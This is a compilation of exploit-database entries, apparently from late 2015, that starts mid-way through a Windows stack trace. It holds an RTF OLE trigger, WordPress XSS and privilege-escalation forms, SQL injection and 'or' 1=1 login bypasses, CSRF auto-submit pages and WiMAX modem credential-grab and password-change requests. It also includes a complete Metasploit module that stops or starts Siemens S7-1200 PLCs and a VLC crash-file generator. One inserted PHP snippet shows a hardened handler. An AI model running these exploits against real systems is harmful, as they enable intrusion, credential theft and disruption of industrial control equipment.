001b882c 766fdb41 d0908070 0678a6e8 06a70490 ole32!AppInvoke+0xab [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1086]
001b890c 766fe1fd 06798260 003d6098 00000000 ole32!ComInvokeWithLockAndIPID+0x372 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1724]
001b8934 76619367 06798260 00000000 06798260 ole32!ComInvoke+0xc5 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 1469]
001b8948 766fe356 06798260 06798260 0039d408 ole32!ThreadDispatch+0x23 [d:\w7rtm\com\ole32\com\dcomrem\chancont.cxx @ 298]
001b895c 766fe318 06798260 001b8a64 00000000 ole32!DispatchCall+0x27 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4273]
001b8988 766fcef0 001b8a50 001b8b78 0697fd00 ole32!CRpcChannelBuffer::SwitchAptAndDispatchCall+0xa1 [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4321]
001b8a68 765f9d01 0697fd00 001b8b78 001b8b60 ole32!CRpcChannelBuffer::SendReceive2+0xef [d:\w7rtm\com\ole32\com\dcomrem\channelb.cxx @ 4076]
001b8ae4 765f9b24 0697fd00 001b8b78 001b8b60 ole32!CAptRpcChnl::SendReceive+0xaf [d:\w7rtm\com\ole32\com\dcomrem\callctrl.cxx @ 603]
001b8b38 766fce06 0697fd00 001b8b78 001b8b60 ole32!CCtxComChnl::SendReceive+0x1c5 [d:\w7rtm\com\ole32\com\dcomrem\ctxchnl.cxx @ 734]
001b8b54 7675476e 06a39d34 001b8ba4 767c6753 ole32!NdrExtpProxySendReceive+0x49 [d:\w7rtm\com\rpc\ndrole\proxy.cxx @ 1932]
001b8b60 767c6753 7a61ad54 001b8fb0 0700022b RPCRT4!NdrpProxySendReceive+0xe
001b8f78 766fc8e2 7660fa10 7661484a 001b8fb0 RPCRT4!NdrClientCall2+0x1a6
001b8f98 765f98ad 00000014 00000004 001b8fc8 ole32!ObjectStublessClient+0xa2 [d:\w7rtm\com\rpc\ndrole\i386\stblsclt.cxx @ 474]
001b8fa8 765e8d1f 06a39d34 00000000 001b94e4 ole32!ObjectStubless+0xf [d:\w7rtm\com\rpc\ndrole\i386\stubless.asm @ 154]
001b8fc8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737]
001b8fe8 765e8a53 76706494 001b9340 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630]
001b9024 765e8e0d 76706494 001b9340 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487]
001b904c 76603170 76706494 00000000 001b94e4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377]
001b908c 76602ef4 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b92ec 76603170 76706448 00000000 001b94e4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685]
001b932c 76603098 001b94e4 00000000 001b9a50 ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
001b9b04 76609e25 001b9c20 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334]
001b9b64 76609d86 001b9c20 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343]
001b9b88 76609d3f 001b9c20 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157]
001b9bb8 7662154c 001b9c20 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110]
001b9c34 7661f2af ecabafc9 11d27f19 00008e97 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046]
001b9c98 7661f1d4 053d0820 00000000 605c63a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576]
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Common Files\Microsoft Shared\office14\mso.dll - 
001b9cc0 5eb283bf 053d0820 605c63a8 02397a00 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495]
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files\Microsoft Office\Office14\wwlib.dll - 
WARNING: Stack unwind information not available. Following frames may be wrong.
001b9d34 60a53973 053d0820 605c63a8 02397a00 mso!Ordinal2023+0x7c
001b9d80 60a53881 036dc800 053d0820 605c63a8 wwlib!DllGetLCID+0x46e24d


It is also possible to trigger this DLL load without requiring a user click by using the following RTF document:

{\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7becabafc9-7f19-11d2-978e-0000f8757e2a\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}}


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38968.zip
            
# Exploit Title: Admin Management Xtended 2.4.0 Privilege escalation
# Date: 14-12-2015
# Software Link: https://wordpress.org/plugins/admin-management-xtended/
# Exploit Author: Kacper Szurek
# Contact: http://twitter.com/KacperSzurek
# Website: http://security.szurek.pl/
# Category: webapps
 
1. Description

Almost none of the plugin's wp_ajax handlers perform a privilege (capability) check.

File: admin-management-xtended\general-functions.php

add_action( 'wp_ajax_ame_toggle_visibility', 'ame_toggle_visibility' );
add_action( 'wp_ajax_ame_set_date', 'ame_set_date' );
add_action( 'wp_ajax_ame_save_title', 'ame_save_title' );
add_action( 'wp_ajax_ame_save_slug', 'ame_save_slug' );
add_action( 'wp_ajax_ame_slug_edit', 'ame_slug_edit' );
add_action( 'wp_ajax_ame_save_order', 'ame_save_order' );
add_action( 'wp_ajax_ame_toggle_orderoptions', 'ame_toggle_orderoptions' );
add_action( 'wp_ajax_ame_toggle_showinvisposts', 'ame_toggle_showinvisposts' );
add_action( 'wp_ajax_ame_get_pageorder', 'ame_get_pageorder' );
add_action( 'wp_ajax_ame_ajax_save_categories', 'ame_ajax_save_categories' );
add_action( 'wp_ajax_ame_ajax_get_categories', 'ame_ajax_get_categories' );
add_action( 'wp_ajax_ame_ajax_set_commentstatus', 'ame_ajax_set_commentstatus' );
add_action( 'wp_ajax_ame_ajax_save_tags', 'ame_ajax_save_tags' );
add_action( 'wp_ajax_ame_ajax_toggle_imageset', 'ame_ajax_toggle_imageset' );
add_action( 'wp_ajax_ame_ajax_save_mediadesc', 'ame_ajax_save_mediadesc' );
add_action( 'wp_ajax_ame_author_edit', 'ame_author_edit' );
add_action( 'wp_ajax_ame_save_author', 'ame_save_author' );
add_action( 'wp_ajax_ame_toggle_excludestatus', 'ame_toggle_excludestatus' );
add_action( 'wp_ajax_ame_toggle_sticky', 'ame_toggle_sticky' );

http://security.szurek.pl/admin-management-xtended-240-privilege-escalation.html

2. Proof of Concept

Log in as a regular user (created via wp-login.php?action=register). You can then change any post's title:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=ame_save_title">
Post id: <input type="text" name="category_id" value="1">
Post title: <input type="text" name="new_title" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" value="Change">
</form>

The XSS payload is rendered on the post page:

http://wordpress-url/?p=1

Or change media excerpt:

<form method="post" action="http://wordpress-url/wp-admin/admin-ajax.php?action=ame_ajax_save_mediadesc">
Post id: <input type="text" name="postid" value="1">
Excerpt: <input type="text" name="new_mediadesc" value="<script>alert(document.cookie);</script>">
<input type="submit" name="submit" value="Change">
</form>

The XSS payload is rendered for the admin at:

http://wordpress-url/wp-admin/upload.php

3. Solution:
   
Update to version 2.4.0.1
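A hardened replacement for one of the handlers listed above, added here as an example and not the plugin's own code. It assumes WordPress is loaded, registers under the same wp_ajax_ame_save_title action, keeps the PoC's category_id / new_title field names, and adds a hypothetical nonce field that the calling page must obtain via wp_create_nonce('ame_save_title').

```php
<?php
// Added example, not Admin Management Xtended's code. It shows the two checks
// every wp_ajax_* handler in the advisory lacks: a nonce (CSRF) check and a
// capability (authorization) check, applied to the ame_save_title action.
// Assumes: WordPress is loaded; the request carries a 'nonce' field created
// with wp_create_nonce('ame_save_title') (hypothetical field name).

add_action( 'wp_ajax_ame_save_title', 'ame_save_title_hardened' );

function ame_save_title_hardened() {
	// 1. CSRF: the nonce must have been issued to this user for this action.
	//    check_ajax_referer() terminates the request with -1 if it is missing or stale.
	check_ajax_referer( 'ame_save_title', 'nonce' );

	// 2. Input handling: post id must be a positive integer; the title is reduced
	//    to a single line of plain text, which drops the PoC's <script> tag.
	$post_id   = isset( $_POST['category_id'] ) ? absint( $_POST['category_id'] ) : 0;
	$new_title = isset( $_POST['new_title'] )
		? sanitize_text_field( wp_unslash( $_POST['new_title'] ) )
		: '';

	if ( 0 === $post_id || '' === $new_title ) {
		wp_send_json_error( array( 'message' => 'missing post id or title' ), 400 );
	}

	// 3. Authorization: this is the check the original handlers do not perform.
	//    A subscriber-level account (the one registered via wp-login.php) has no
	//    edit_posts capability at all, so it fails here for every post; authors
	//    pass only for their own posts, editors and admins for any post.
	if ( ! current_user_can( 'edit_post', $post_id ) ) {
		wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
	}

	// Only now touch the database, through the WordPress API rather than raw SQL.
	$result = wp_update_post(
		array( 'ID' => $post_id, 'post_title' => $new_title ),
		true // return a WP_Error instead of 0 on failure
	);

	if ( is_wp_error( $result ) ) {
		wp_send_json_error( array( 'message' => $result->get_error_message() ), 500 );
	}

	wp_send_json_success( array( 'ID' => $post_id, 'post_title' => $new_title ) );
}
```

The same three steps (nonce, input normalisation, current_user_can with the capability matching the action) apply to each of the other seventeen handlers in the advisory's list.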
            
#Exploit Title   : ECommerceMajor SQL Injection Vulnerability
#Exploit Author  : Rahul Pratap Singh
#Date            : 13/Dec/2015
#Home page Link  : https://github.com/xlinkerz/ecommerceMajor
#Website         : 0x62626262.wordpress.com
#Linkedin        : https://in.linkedin.com/in/rahulpratapsingh94

1. Description

The "prodid" parameter in productdtl.php is not properly sanitized, which leads to
a SQL injection vulnerability.

2. Vulnerable Code:

Lines 14 to 28:

<?php
$getallproduct="select * from purchase where id=$_GET[prodid] order by id desc";
$getallproductresult=mysql_query($getallproduct);
$getallproducttotal=mysql_num_rows($getallproductresult);

3. POC

http://127.0.0.1/ecommercemajor/productdtl.php?prodid=SQLI
            
# Exploit Title: Simatic S7 1200 CPU command module
# Date: 15-12-2015
# Exploit Author: Nguyen Manh Hung
# Vendor Homepage: http://www.siemens.com/
# Tested on: Siemens Simatic S7-1214C
# CVE : None
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
	
	include Msf::Exploit::Remote::Tcp
	include Msf::Auxiliary::Scanner
	def initialize(info = {})
		super(update_info(info,
			'Name'=> 'Simatic S7-1200 CPU START/STOP Module',
			'Description'   => %q{
				Update 2015
				The Siemens Simatic S7-1200 S7 CPU start and stop functions over ISO-TSAP.
			},
			'Author'      => 'Nguyen Manh Hung <tdh.mhung@gmail.com>',
			'License'           => MSF_LICENSE,
			'References'     =>
				[
					[ 'nil' ],
				],
			'Version'        => '$Revision$',
			'DisclosureDate' => '11-2015'
			))
			
			register_options(
				[
					Opt::RPORT(102),
					OptInt.new('FUNC',[true,'func',1]),
					OptString.new('MODE', [true, 'Mode select:
					START -- start PLC
					STOP  -- stop PLC
					SCAN  -- PLC scanner',"SCAN"]),
				], self.class)
	end
####################################################################################
	def packet()
		packets=[		# based on TIA Portal, replaces the hello plc
						"\x03\x00\x00\x23\x1e\xe0\x00\x00"+
						"\x00\x06\x00\xc1\x02\x06\x00\xc2"+
						"\x0f\x53\x49\x4d\x41\x54\x49\x43"+
						"\x2d\x52\x4f\x4f\x54\x2d\x45\x53"+
						"\xc0\x01\x0a",

                 		#session debug
               			"\x03\x00\x00\xc0\x02\xf0\x80\x72"+
               			"\x01\x00\xb1\x31\x00\x00\x04\xca"+
               			"\x00\x00\x00\x02\x00\x00\x01\x20"+
               			"\x36\x00\x00\x01\x1d\x00\x04\x00"+
               			"\x00\x00\x00\x00\xa1\x00\x00\x00"+
               			"\xd3\x82\x1f\x00\x00\xa3\x81\x69"+
               			"\x00\x15\x16\x53\x65\x72\x76\x65"+
               			"\x72\x53\x65\x73\x73\x69\x6f\x6e"+
               			"\x5f\x43\x43\x39\x43\x33\x39\x33"+
               			"\x44\xa3\x82\x21\x00\x15\x0b\x31"+
               			"\x3a\x3a\x3a\x36\x2e\x30\x3a\x3a"+
               			"\x3a\x12\xa3\x82\x28\x00\x15\x0d"+
               			"\x4f\x4d\x53\x2b\x20\x44\x65\x62"+
               			"\x75\x67\x67\x65\x72\xa3\x82\x29"+
               			"\x00\x15\x00\xa3\x82\x2a\x00\x15"+
               			"\x00\xa3\x82\x2b\x00\x04\x84\x80"+
               			"\x80\x80\x00\xa3\x82\x2c\x00\x12"+
               			"\x11\xe1\xa3\x00\xa3\x82\x2d\x00"+
               			"\x15\x00\xa1\x00\x00\x00\xd3\x81"+
               			"\x7f\x00\x00\xa3\x81\x69\x00\x15"+
               			"\x15\x53\x75\x62\x73\x63\x72\x69"+
               			"\x70\x74\x69\x6f\x6e\x43\x6f\x6e"+
               			"\x74\x61\x69\x6e\x65\x72\xa2\xa2"+
               			"\x00\x00\x00\x00\x72\x01\x00\x00",
                		
						######
						"\x03\x00\x00\x77\x02\xf0\x80\x72"+#p1
						"\x02\x00\x68\x31\x00\x00\x05\x42"+
						"\x00\x00\x00\x03\x00\x00\x03\xff"+
						"\x34\x00\x00\x03\xff\x01\x01\x82"+
						"\x32\x01\x00\x17\x00\x00\x01\x3a"+
						"\x82\x3b\x00\x04\x81\x40\x82\x3c"+
						"\x00\x04\x81\x40\x82\x3d\x00\x04"+
						"\x00\x82\x3e\x00\x04\x84\x80\xc0"+
						"\x40\x82\x3f\x00\x15\x00\x82\x40"+
						"\x00\x15\x05\x32\x3b"+
						"\x35\x34\x34\x82\x41"+
						"\x00\x03\x00\x03\x00\x00\x00\x00"+#2
						"\x04\xe8\x89\x69\x00\x12\x00\x00"+
						"\x00\x00\x89\x6a\x00\x13\x00\x89"+
						"\x6b\x00\x04\x00\x00\x00\x00\x00"+
						"\x00\x72\x02\x00\x00",
						#unknown 
                		"\x03\x00\x00\x07\x02\xf0\x00",
						# start the diag process
                		"\x03\x00\x00\x2b\x02\xf0\x80\x72"+
                		"\x02\x00\x1c\x31\x00\x00\x04\xbb"+
                		"\x00\x00\x00\x05\x00\x00\x03\xff"+
                		"\x34\x00\x00\x00\x01\x00\x00\x00"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
						# continue diag
                		"\x03\x00\x00\x2b\x02\xf0\x80\x72"+
                		"\x02\x00\x1c\x31\x00\x00\x04\xbb"+
                		"\x00\x00\x00\x06\x00\x00\x03\xff"+
                		"\x34\x00\x00\x00\x02\x00\x01\x01"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
# before start-stop
                		"\x03\x00\x00\x42\x02\xf0\x80"+
                		"\x72\x02\x00\x33\x31\x00\x00\x04"+
                		"\xfc\x00\x00\x00\x07\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x02\x91"+
                		"\x3d\x9b\x1e\x00\x00\x04\xe8\x89"+
                		"\x69\x00\x12\x00\x00\x00\x00\x89"+
                		"\x6a\x00\x13\x00\x89\x6b\x00\x04"+
                		"\x00\x00\x00\x00\x00\x00\x00\x72"+
                		"\x02\x00\x00",
#start
						"\x03\x00\x00\x43\x02\xf0\x80"+
                		"\x72\x02\x00\x34\x31\x00\x00\x04"+
                		"\xf2\x00\x00\x00\x08\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x01\x90"+
                		"\x77\x00\x08\x03\x00\x00\x04\xe8"+
                		"\x89\x69\x00\x12\x00\x00\x00\x00"+
                		"\x89\x6a\x00\x13\x00\x89\x6b\x00"+
                		"\x04\x00\x00\x00\x00\x00\x00\x00"+
                		"\x72\x02\x00\x00",
#stop
						"\x03\x00\x00\x43\x02\xf0\x80"+
                		"\x72\x02\x00\x34\x31\x00\x00\x04"+
                		"\xf2\x00\x00\x00\x08\x00\x00\x03"+
                		"\xff\x36\x00\x00\x00\x34\x01\x90"+
                		"\x77\x00\x08\x01\x00\x00\x04\xe8"+
                		"\x89\x69\x00\x12\x00\x00\x00\x00"+
                		"\x89\x6a\x00\x13\x00\x89\x6b\x00"+
                		"\x04\x00\x00\x00\x00\x00\x00\x00"+
                		"\x72\x02\x00\x00",
			]
		return packets
	end
#############################################################################
	def start_PLC(scr)
		print_good "mode select: START"
		sock.put(packet[6].gsub("\xff",[scr].pack("c"))) # send the pre start/stop packet
		sock.get_once()
		sleep(0.05)
		sock.put(packet[7].gsub("\xff",[scr].pack("c"))) # send the START packet
		#sock.get_once()
		dt=sock.get_once(-1, sock.def_read_timeout)
		if dt.length.to_i == 30
			print_good "PLC---->RUN"
		else
			a= dt.to_s.gsub(/[\x80-\xff]/," ")
			print_error a.to_s.gsub(/[\x00-\x30]/," ")
		end
	end
#############################################################################
	def stop_PLC(scr)
		print_good "mode select: STOP"
		sock.put(packet[6].gsub("\xff",[scr].pack("c"))) # send the pre start/stop packet
		sock.get_once()
		sleep(0.05)
		sock.put(packet[8].gsub("\xff",[scr].pack("c"))) # send the STOP packet
		dt=sock.get_once(-1, sock.def_read_timeout)
		if dt.length.to_i == 30
			print_good "PLC---->STOP"
		else
			a= dt.to_s.gsub(/[\x80-\xff]/," ")
			print_error a.to_s.gsub(/[\x00-\x30]/," ")
		end
	end
#############################################################################
	def PLC_SCAN(ip)
		sock.put(packet[0])#send hello plc
		sock.get_once()
		sleep(0.05)
		sock.put(packet[1]) # request a debug session
		dt=sock.get_once(-1, sock.def_read_timeout)
		sock.put(packet[3]) # send the unknown packet
		sock.get_once()
		arr=dt.split(/;/)
		print_good "#{ip.to_s}:  #{arr[2].to_s} : #{arr[3][0..3].to_s}"
	end
#############################################################################
	def run_host(ip)
		mode=datastore['MODE']
		func=datastore['FUNC']
		connect()
		if mode !="scan" && mode!="SCAN" 
			sock.put(packet[0])#send hello plc
			sock.get_once()
			sleep(0.05)
			sock.put(packet[1]) # request a debug session
			dt=sock.get_once(-1, sock.def_read_timeout)
			sock.put(packet[3]) # send the unknown packet
			sock.get_once()
			arr=dt.split(/;/)
			print_good "#{arr[2].to_s} : #{arr[3][0..3].to_s}"
			data=dt.unpack("C*")
			a= (data[24]).to_i
			b= (data[26]).to_i
			scr=a|128
			scr1=b|128
			#print_line scr.to_s
			if arr.length.to_i ==5 # if a session was obtained
				session_i= arr[4][0..4].each_byte.map { |dt| '\x%02x' % dt.to_i }.join
				pac=packet[2].gsub("\xff",[scr].pack("c"))
				sock.put(pac.gsub("\x35\x34\x34\x82\x41", arr[4][0..4]))
			end
			sock.put(packet[3]) # send the unknown packet to the plc
			sock.get_once()
			case mode
				when "START" , "start"
					start_PLC(scr)
				when "STOP" , "stop"
					stop_PLC(scr)
				else
					print_error("Invalid MODE")
			end
		else
			PLC_SCAN(ip)
		end
		disconnect()
	end
end
            
source: https://www.securityfocus.com/bid/64707/info
              
Command School Student Management System is prone to the following security vulnerabilities:
              
1. Multiple SQL-injection vulnerabilities
2. A cross-site request forgery vulnerability
3. A cross-site scripting vulnerability
4. An HTML injection vulnerability
5. A security-bypass vulnerability
              
Exploiting these issues could allow an attacker to run malicious HTML and script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or bypass certain security restrictions to perform unauthorized actions.
              
Command School Student Management System 1.06.01 is vulnerable; other versions may also be affected. 

[CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://www.example.com/sw/add_topic.php">
<input type="hidden" name="topic"
value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>
            
                .__        _____        _______                
                |  |__    /  |  |___  __\   _  \_______   ____ 
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/
                         _____________________________ 
                        /   _____/\_   _____/\_   ___ \  
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____ 
                       /_______  //_______  / \______  /
                               \/         \/         \/           
iy10 Dizin Scripti   => Multiple Vulnerabilities (CSRF & Authentication Bypass)
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : knockout@e-mail.com.tr
[~] HomePage : http://milw00rm.com - http://h4x0resec.blogspot.com 
[~] Sweet People :  ZoRLu, ( milw00rm.com ), 
                      Septemb0x , BARCOD3 , _UnDeRTaKeR_ , BackDoor, DaiMon
                      KedAns-Dz, b3mb4m
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : iy10 Dizin Scripti
|~Affected Version : All versions
|~Software  : http://wmscripti.com/php-scriptler/iy10-dizin-scripti.html
|~RISK : High
|~Google Keyword :  "Sitenizi dizine eklemek için tıklayın !"

################## ++ CSRF Admin Password Change Exploit ++ ######################################

<html>
  <body>
    <form action="http://[TARGET]/admin/kullaniciayarlar.php" method="POST">
      <input type="hidden" name="kullaniciadi" value="knockout" />
      <input type="hidden" name="sifre" value="password" />
      <input type="hidden" name="Submit" value="Exploit!" />
	  <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

################# ++ SQL Injection with Authentication Bypass ++###########################################

http://[TARGET]/admin 
ID: 'or' 1=1
PW : 'or' 1=1

############################################################
            
source: https://www.securityfocus.com/bid/64564/info

WordPress is prone to a cross-site request-forgery vulnerability because it does not properly validate HTTP requests.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

WordPress 2.0.11 is vulnerable.

http://www.example.com/wp-admin/options-discussion.php?action=retrospam&move=true&ids=1 
            
### Exploit Title: WIMAX MT711x - Multiple Vulnerabilities
### Date: Friday, December 11, 2015
### Exploit/Vulnerability Author: Alireza Azimzadeh Milani (alimp5)
### Vendor Homepage: http://www.seowonintech.co.kr/en/
### Version: V_3_11_14_9_CPE
### Tested on: Kali-Linux

I'm an ethical penetration tester and super moderator of Iran Security Team (http://irsecteam.org).
I have updated the modem to the latest firmware released by the company,
but even with this work (upgrading the firmware), the attacker can bypass the authentication mechanism.

### Details of MT711x model:
Version Information:
Build Time 	 2014.08.18-11:49
CPE Ver 	 1.0.9
MTK FW Ver 	 EX_REL_MT711x_V_3_11_14_9_CPE
Serial Number 	 IRMB1351C9200-0001044

I used the tools below to find the vulnerabilities:
1)BurpSuite - Free Edition     2)wget      3)Nmap


### POCs of the modem:
#Get the WIFI settings>>
wget -c "http://server/cgi-bin/multi_wifi.cgi"

#Get Wimax credentials>>
wget -c "http://server/cgi-bin/wccm_wimax_setting.cgi"

#Enable and disable connections to the modem (by default these are ENABLED)>>
http://server/cgi-bin/remote.cgi


#Ping a system (useful for launching (D)DOS attack)>>
POST /cgi-bin/diagnostic.cgi HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/cgi-bin/diagnostic.cgi
Cookie: login=; login=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 158
select_mode_ping=on&ping_ipaddr=4.2.2.4&ping_count=10&trace_ipaddr=&trace_max_ttl=6&trace_qoeries_num=3&trace_report_only_hidden=0&action=Apply&html_view=ping

#Change the password of ADMIN account:
POST /cgi-bin/pw.cgi HTTP/1.1
Host: server
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/cgi-bin/pw.cgi
Cookie: login=admin
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 81
isp_name=mobinnet&pw_set_select=admin&passPass=admin&passCfirm=admin&action=Apply


### Conclusion: 
1) The attacker can read sensitive information and set it on his own modem, for example to use the Internet for free.
2) Anyone who can send a packet to the modem can crash/downgrade/DoS it.
3) Control of similar modems (MT711x) can be obtained in order to launch DoS or DDoS attacks on targets on the WWW (World Wide Web).


At the end, I am thankful and I wait for your response.
            
// source: https://www.securityfocus.com/bid/64623/info

VLC Media Player is prone to a denial-of-service vulnerability.

Successful exploits may allow attackers to crash the affected application, denying service to legitimate users.

VLC Media Player 1.1.11 is vulnerable; other versions may also be affected. 

# Exploit Title: VLC v. 1.1.11 .nsv DOS
# Date: 3/14/2012
# Author: Dan Fosco
# Vendor or Software Link: www.videolan.org
# Version: 1.1.11
# Category: local
# Google dork: n/a
# Tested on: Windows XP SP3 (64-bit)
# Demo site: n/a

#include <stdio.h>

int main(void)
{
	FILE *f;
	f = fopen("dos.nsv", "w");
	if (f == NULL) {
		perror("fopen");
		return 1;
	}
	/* "NSVf" file header magic followed by four zero bytes */
	fputs("\x4e\x53\x56\x66", f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fputc('\x00', f);
	fclose(f);
	return 0;
}

// use this code to create the malicious file

edit:  works on 2.0.1.0
            
# Title : GoAutoDial CE 3.3 Multiple SQL injections, Command Injection
# Date : 06/12/2015
# Author : R-73eN
# Tested on : goautodial-32bit-ce-3.3-final
# Software : http://goautodial.org/
#  ___        __        ____                 _    _  
# |_ _|_ __  / _| ___  / ___| ___ _ __      / \  | |    
#  | || '_ \| |_ / _ \| |  _ / _ \ '_ \    / _ \ | |    
#  | || | | |  _| (_) | |_| |  __/ | | |  / ___ \| |___ 
# |___|_| |_|_|  \___/ \____|\___|_| |_| /_/   \_\_____|
#

Vulnerabilities

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

call_report_export.php

Line 131

$LOGip = getenv("REMOTE_ADDR");
$LOGbrowser = getenv("HTTP_USER_AGENT");
$LOGscript_name = getenv("SCRIPT_NAME");
$LOGserver_name = getenv("SERVER_NAME");
$LOGserver_port = getenv("SERVER_PORT");
$LOGrequest_uri = getenv("REQUEST_URI");
$LOGhttp_referer = getenv("HTTP_REFERER");
if (preg_match("/443/i",$LOGserver_port)) {$HTTPprotocol = 'https://';}
  else {$HTTPprotocol = 'http://';}
if (($LOGserver_port == '80') or ($LOGserver_port == '443') ) {$LOGserver_port='';}
else {$LOGserver_port = ":$LOGserver_port";}
$LOGfull_url = "$HTTPprotocol$LOGserver_name$LOGserver_port$LOGrequest_uri";

$stmt="INSERT INTO vicidial_report_log set event_date=NOW(), user='$PHP_AUTH_USER', ip_address='$LOGip', report_name='$report_name', browser='$LOGbrowser', referer='$LOGhttp_referer', notes='$LOGserver_name:$LOGserver_port $LOGscript_name |$campaign[0], $query_date, $end_date|', url='$LOGfull_url';";


$LOGip, $LOGbrowser etc. are not sanitized and are passed directly to a SQL query.
For example, passing a crafted User-Agent header will cause a SQL injection.

The following files are vulnerable to the same vulnerability:
call_report_export.php
voice_lab.php
user_status.php
user_stats.php
timeclock_status.php
timeclock_report.php
sph_report.php
group_hourly_stats.php
realtime_report.php
lead_report_export.php
list_download.php
fcstats.php
call_report_export.php
AST_VICIDIAL_ingrouplist.php
AST_VICIDIAL_hopperlist.php
AST_usergroup_login_report.php
AST_team_performance_detail.php
AST_VDADstats.php
AST_server_performance.php
campaign_debug.php
AST_LIST_UPDATEstats.php
AST_LISTS_campaign_stats.php
AST_OUTBOUNDsummary_interval.php
AST_IVRstats.php
AST_IVRfilter.php
AST_inbound_daily_report.php
and many other files.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

web_form_forward.php
Line 15

if (isset($_GET["user"])) {$user=$_GET["user"];}

require("dbconnect.php");
$stmt="SELECT full_name from vicidial_users where user='$user';";
$rslt=mysql_query($stmt, $link);
$row=mysql_fetch_row($rslt);

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

QM_live_monitor.php

If QueueMetrics is enabled, the following file is vulnerable to SQL injection.

Line 31
if (isset($_GET["call"])){$call=$_GET["call"];}
elseif (isset($_POST["call"]))	{$call=$_POST["call"];}
.
.
.
$stmt = "SELECT user,server_ip,conf_exten,comments FROM vicidial_live_agents where callerid='$call';";


As you can see, the $call parameter is not sanitized, which leads to SQL injection.


++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++


call_log_display.php SQL injection


There is no validation of $server_ip and $session_name:
if( (strlen($server_ip)<6) or (!isset($server_ip)) or ( (strlen($session_name)<12) or (!isset($session_name)) ) )
.
.
